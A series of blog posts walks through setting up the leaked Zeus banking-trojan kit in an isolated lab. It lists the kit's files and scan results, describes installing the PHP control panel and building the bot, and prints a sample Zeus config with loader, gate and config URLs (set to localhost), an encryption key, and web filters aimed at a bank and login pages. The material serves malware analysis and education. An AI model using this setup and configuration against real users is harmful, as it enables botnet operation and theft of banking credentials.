June 11, 2011 11:20 PM
Posted by: Dan O'Connor
zeus analysis,
zeus botnet,
zeus source code,
zeus walkthroughAfter the fact of building my bot, it’s worth looking at what the basic config file looks like.
entry "StaticConfig"
;botnet "btn1"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "http://localhost/config.bin"
remove_certs 1
disable_tcpserver 0
encryption_key "secret key"
end
entry "DynamicConfig"
url_loader "http://localhost/bot.exe"
url_server "http://localhost/gate.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"http://advdomain/cfg1.bin"
end
entry "WebFilters"
"!*.microsoft.com/*"
"!http://*myspace.com*"
"https://www.gruposantander.es/*"
"!http://*odnoklassniki.ru/*"
"!http://vkontakte.ru/*"
"@*/login.osmp.ru/*"
"@*/atl.osmp.ru/*"
end
entry "WebDataFilters"
;"http://mail.rambler.ru/*" "passw;login"
end
entry "WebFakes"
;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
end
end
At this point we know what the encryption key, url_config, url_loader and url_server is. The rest will have to be tracked back in the source code when we get there.
I am very interested in the webFakes listing.
May 29, 2011 1:26 AM
Posted by: Dan O'Connor
pbs,
pbs video,
wikileaksIt does not matter what your opinion is, you just need to watch this.
http://video.pbs.org/video/1946795242
May 29, 2011 12:47 AM
Posted by: Dan O'Connor
zeus analysis,
zeus botnet,
zeus source code,
zeus walkthroughNext we need to build our bot, and configure it.
This is the zsb.exe file, point it at the config.txt. The IP address of the server will need to be set, and the key configured.
For bonus points, you can use the zsb.exe to check if the host you are running it on is infected. But you will need to know it’s key.
Time for some clickity click.
Uploaded with ImageShack.us
To call this easy is insulting, a monkey can set this up.
So, DON’T DO IT.
This will get you in lots of trouble if you try to use it.
But it’s very educational and fun for our purposes.
JUST DON’T USE IT.
May 29, 2011 12:15 AM
Posted by: Dan O'Connor
zeus analysis,
zeus botnet,
zeus source code,
zeus walkthroughIf all has gone well you should be able to get the install screen.
Uploaded with ImageShack.us
We need to setup the admin user and password, and provide login details to the SQL db. The encryption key also needs to be set at this point.
Hit install and time for more beer!
Here is the completed install screen.
Uploaded with ImageShack.us
Now we can login to the control panel and start to have some fun!
Uploaded with ImageShack.us
I can say that I am impressed with the interface, simple and very effective.
Part 4 will be the infection of the first host.
May 28, 2011 12:44 AM
Posted by: Dan O'Connor
zeus analysis,
zeus botnet,
zeus source code,
zeus walkthroughIf you are following at home you are going to need to install some webby stuff on your “server”.
I am going to use XAMPP.
Also your machines are going to need to be able to talk, so make sure you are all setup. Using VMWare I setup a network that only the server and the machine that is called infect can talk.
I will not go into the setup of XAMPP, just remember to configure your apache and any needed security settings to run the php.
At this point you should be able to connect to your new web server and we can now start installing the C2.
May 25, 2011 10:25 PM
Posted by: Dan O'Connor
zeus analysis,
zeus botnet,
zeus source code,
zeus walkthroughI am going to step through the Zeus bot source code. I will start with the PHP stuff, which should be pretty light. There is about 44 PHP files to go over.
> find . -type f -name "*.php"
./cp.php
./gate.php
./index.php
./install/index.php
./system/botnet_bots.lng.en.php
./system/botnet_bots.lng.ru.php
./system/botnet_bots.php
./system/botnet_scripts.lng.en.php
./system/botnet_scripts.lng.ru.php
./system/botnet_scripts.php
./system/fsarc.php
./system/global.php
./system/index.php
./system/jabberclass.php
./system/lng.en.php
./system/lng.ru.php
./system/reports_db.lng.en.php
./system/reports_db.lng.ru.php
./system/reports_db.php
./system/reports_files.lng.en.php
./system/reports_files.lng.ru.php
./system/reports_files.php
./system/reports_jn.lng.en.php
./system/reports_jn.lng.ru.php
./system/reports_jn.php
./system/stats_main.lng.en.php
./system/stats_main.lng.ru.php
./system/stats_main.php
./system/stats_os.lng.en.php
./system/stats_os.lng.ru.php
./system/stats_os.php
./system/sys_info.lng.en.php
./system/sys_info.lng.ru.php
./system/sys_info.php
./system/sys_options.lng.en.php
./system/sys_options.lng.ru.php
./system/sys_options.php
./system/sys_user.lng.en.php
./system/sys_user.lng.ru.php
./system/sys_user.php
./system/sys_users.lng.en.php
./system/sys_users.lng.ru.php
./system/sys_users.php
./theme/index.php
Then we got a whole wack of c to go through.
Also if you are following at home you may need to install the Russian lang pack for your OS.
First thing we need to do is install this stuff, and we will start to get an idea of what does what.
May 24, 2011 10:02 PM
Posted by: Dan O'Connor
zues bot net,
zues rarSo what was in the Zues rar?
7z.exe – Looks clean, nothing reported on it.
bt.exe – Listed as suspicious but nothing specific by any vendor.
upx.exe – Nothing reported.
FASM.exe – Listed as suspicious but nothing specific by any vendor.
php.exe – Nothing reported.
zip.exe – Nothing reported.
zsb.exe – Reported as Trojan-Spy:W32/Zbot, everything reports this as the main exe for the Zeus botnet.
zsbcs.exe – Backdoor, Backdoor.Generic.653241
Lots of PHP, cpp, xml, a few txt and a GeoIP lookup csv.
If you do not know what that one is, it’s a list of IP’s ranges with the assigned country code. This list can be purchased online and is frequently updated with changes.
More to come.
